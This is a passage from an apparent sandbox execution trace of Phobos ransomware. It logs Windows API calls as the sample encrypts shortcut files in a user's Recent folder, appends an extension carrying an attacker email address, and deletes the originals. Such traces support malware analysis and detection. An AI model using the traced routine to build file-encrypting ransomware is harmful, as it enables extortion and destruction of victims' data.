lpNewFilePointer=0x0) returned 1 [0201.288] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.289] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.289] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x303, lpOverlapped=0x0) returned 1 [0201.290] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x310, dwBufLen=0x310 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x310) returned 1 [0201.290] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x310, lpOverlapped=0x0) returned 1 [0201.291] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.291] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.291] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.291] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.291] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.291] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.291] CloseHandle (hObject=0x160) returned 1 [0201.292] CloseHandle (hObject=0x174) returned 1 [0201.292] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk")) returned 1 [0201.293] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s3by04Y2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\s3by04y2.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.293] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3991) returned 1 [0201.293] CloseHandle (hObject=0x174) returned 1 [0201.293] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s3by04Y2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\s3by04y2.lnk")) returned 0x20 [0201.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s3by04Y2.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\s3by04y2.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s3by04Y2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\s3by04y2.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.294] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.294] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s3by04Y2.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\s3by04y2.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.295] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.296] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.296] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf97, lpOverlapped=0x0) returned 1 [0201.297] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xfa0, dwBufLen=0xfa0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xfa0) returned 1 [0201.297] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xfa0, lpOverlapped=0x0) returned 1 [0201.298] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.298] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.298] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.298] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.298] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.298] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.298] CloseHandle (hObject=0x174) returned 1 [0201.298] CloseHandle (hObject=0x160) returned 1 [0201.298] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s3by04Y2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\s3by04y2.lnk")) returned 1 [0201.299] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SiuhuZKaECuiEzUv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\siuhuzkaecuiezuv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.300] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5294) returned 1 [0201.300] CloseHandle (hObject=0x160) returned 1 [0201.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SiuhuZKaECuiEzUv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\siuhuzkaecuiezuv.lnk")) returned 0x20 [0201.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SiuhuZKaECuiEzUv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\siuhuzkaecuiezuv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SiuhuZKaECuiEzUv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\siuhuzkaecuiezuv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.300] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.300] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SiuhuZKaECuiEzUv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\siuhuzkaecuiezuv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.301] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.301] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.301] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x14ae, lpOverlapped=0x0) returned 1 [0201.302] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x14b0, dwBufLen=0x14b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x14b0) returned 1 [0201.302] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x14b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x14b0, lpOverlapped=0x0) returned 1 [0201.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.303] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.303] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.303] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.303] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.303] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.303] CloseHandle (hObject=0x160) returned 1 [0201.303] CloseHandle (hObject=0x174) returned 1 [0201.303] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SiuhuZKaECuiEzUv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\siuhuzkaecuiezuv.lnk")) returned 1 [0201.304] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sM5nqK2Lu kC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\sm5nqk2lu kc.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.427] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3856) returned 1 [0201.427] CloseHandle (hObject=0xfc) returned 1 [0201.427] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sM5nqK2Lu kC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\sm5nqk2lu kc.lnk")) returned 0x20 [0201.427] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sM5nqK2Lu kC.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\sm5nqk2lu kc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sM5nqK2Lu kC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\sm5nqk2lu kc.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.427] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.427] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sM5nqK2Lu kC.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\sm5nqk2lu kc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.428] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.428] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.428] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf10, lpOverlapped=0x0) returned 1 [0201.430] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20, dwBufLen=0xf20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20) returned 1 [0201.430] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf20, lpOverlapped=0x0) returned 1 [0201.430] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.430] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.430] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.431] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.431] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.431] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.431] CloseHandle (hObject=0xfc) returned 1 [0201.431] CloseHandle (hObject=0x174) returned 1 [0201.431] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sM5nqK2Lu kC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\sm5nqk2lu kc.lnk")) returned 1 [0201.432] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tnjr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tnjr.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.432] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=976) returned 1 [0201.432] CloseHandle (hObject=0x174) returned 1 [0201.433] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tnjr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tnjr.lnk")) returned 0x20 [0201.433] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tnjr.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tnjr.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tnjr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tnjr.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.433] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.433] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tnjr.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tnjr.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.434] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.434] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.434] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3d0, lpOverlapped=0x0) returned 1 [0201.435] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3e0, dwBufLen=0x3e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3e0) returned 1 [0201.435] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3e0, lpOverlapped=0x0) returned 1 [0201.436] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.436] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.436] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.436] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.436] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.437] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.437] CloseHandle (hObject=0x174) returned 1 [0201.437] CloseHandle (hObject=0xfc) returned 1 [0201.437] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tnjr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tnjr.lnk")) returned 1 [0201.438] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tPfoYySpv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tpfoyyspv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.438] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3871) returned 1 [0201.438] CloseHandle (hObject=0xfc) returned 1 [0201.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tPfoYySpv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tpfoyyspv.lnk")) returned 0x20 [0201.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tPfoYySpv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tpfoyyspv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tPfoYySpv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tpfoyyspv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.439] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.439] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.439] 